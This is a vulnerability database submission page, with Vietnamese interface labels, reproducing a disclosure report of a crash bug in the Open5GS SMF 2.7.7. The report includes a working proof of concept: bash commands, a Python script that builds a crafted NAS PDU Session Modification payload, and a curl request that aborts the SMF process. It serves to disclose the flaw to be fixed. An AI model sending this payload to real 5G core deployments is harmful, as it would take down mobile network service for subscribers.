Gửi #808489: Open5gs SMF v2.7.7 Denial of Servicethông tin

tiêu đề	Open5gs SMF v2.7.7 Denial of Service
Mô tả	### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description SMF crashes when a `PDU Session Modification Request` delivered through `SmContextUpdateData.n1SmMsg` carries a syntactically valid `requested_qos_flow_descriptions` IE whose bitrate parameter uses an invalid NAS bitrate unit. The parser accepts the 3-byte bitrate structure without validating the unit in `ogs_nas_parse_qos_flow_descriptions()`. Later `gsm_handle_pdu_session_modification_qos_flow_descriptions()` calls `ogs_nas_bitrate_to_uint64()` on the attacker-controlled bitrate: ```c case OGS_NAX_QOS_FLOW_PARAMETER_ID_GFBR_UPLINK: qos_flow->qos.gbr.uplink = ogs_nas_bitrate_to_uint64( &qos_flow_description[i].param[j].br); break; ``` `ogs_nas_bitrate_to_uint64()` fatally aborts on unknown units: ```c ogs_fatal("Unknown unit [%d]", nas_bitrate->unit); ogs_assert_if_reached(); ``` This issue is distinct from the previously confirmed `nsmf-pdusession-pdu-sessions-createddata-invalid-qosflowdescription-assert-abort` report. That older issue is on the H-SMF `201 Created` callback path; this one is on the AMF-facing `sm-contexts/{ref}/modify` N1 business path. ### Steps to reproduce 1. Start the Docker lab and ensure `smf` and `smf-audit-ue` are running. 2. Resolve the current SMF container IP and an active `smContextRef`: ```bash SMF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' smf) docker restart smf-audit-ue >/dev/null sleep 3 REF=$( for i in $(seq 1 30); do code=$(curl --http2-prior-knowledge -m 5 -sS -o /tmp/probe.body -w '%{http_code}' \ -X POST "http://$SMF_IP/nsmf-pdusession/v1/sm-contexts/$i/modify" \ -H 'Content-Type: application/json' \ --data '{"hoState":"COMPLETED"}') if [ "$code" != 404 ]; then echo "$i" break fi done ) echo "SMF_IP=$SMF_IP REF=$REF" ``` 3. Prepare a multipart `SmContextUpdateData` with only `n1SmMsg`, using the malicious NAS payload below. The payload is a `PDU Session Modification Request` whose `requested_qos_flow_descriptions` contains a GFBR uplink parameter with bitrate `unit=0`, which is not a valid NAS bitrate unit: ```bash python3 - <<'PY' from pathlib import Path import json boundary = 'REQBOUNDARY' body = {'n1SmMsg': {'contentId': '5gnas-sm'}} n1 = bytes.fromhex('2e0101c97900080160410203000001') parts = [] parts.append( (f'--{boundary}\r\nContent-Type: application/json\r\n\r\n'.encode()) + json.dumps(body, separators=(',', ':')).encode() + b'\r\n' ) parts.append( (f'--{boundary}\r\nContent-Id: 5gnas-sm\r\n' f'Content-Type: application/vnd.3gpp.5gnas\r\n\r\n'.encode()) + n1 + b'\r\n' ) parts.append(f'--{boundary}--\r\n'.encode()) Path('/tmp/smctx_modify_invalid_bitrate.multipart').write_bytes(b''.join(parts)) PY ``` 4. Send the request: ```bash curl --http2-prior-knowledge -m 10 -sS -i \ -X POST "http://$SMF_IP/nsmf-pdusession/v1/sm-contexts/$REF/modify" \ -H 'Content-Type: multipart/related; boundary=REQBOUNDARY' \ --data-binary @/tmp/smctx_modify_invalid_bitrate.multipart ``` 5. Check the SMF process state and logs: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf docker logs --tail 120 smf ``` ### Logs ```shell Client side: curl: (92) HTTP/2 stream 1 was not closed cleanly SMF state: exited 139 2026-04-11T07:52:16.722895347Z SMF log: 04/11 07:52:16.598: [nas] FATAL: Unknown unit [0] (../lib/nas/common/types.c:502) 04/11 07:52:16.598: [nas] FATAL: ogs_nas_bitrate_to_uint64: should not be reached. (../lib/nas/common/types.c:503) ``` ### Expected behaviour SMF should reject invalid NAS bitrate units in the `n1SmMsg` `PDU Session Modification Request` and fail only that transaction. ### Observed Behaviour The crafted `n1SmMsg` aborts the entire SMF process before any HTTP response is completed, leaving the client with a transport error and the SMF container exiting with code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
Nguồn	⚠️ https://github.com/open5gs/open5gs/issues/4452
Người dùng	FrankLin (UID 97501)
Đệ trình	20/04/2026 21:22 (cách đây 1 tháng)
Kiểm duyệt	11/05/2026 10:02 (21 days later)
Trạng thái	được chấp nhận
Mục VulDB	362585 [Open5GS đến 2.7.7 SMF src/smf/gsm-handler.c n1SmMsg Từ chối dịch vụ]
điểm	20

◂ Trước Tổng Quan Tiếp theo ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!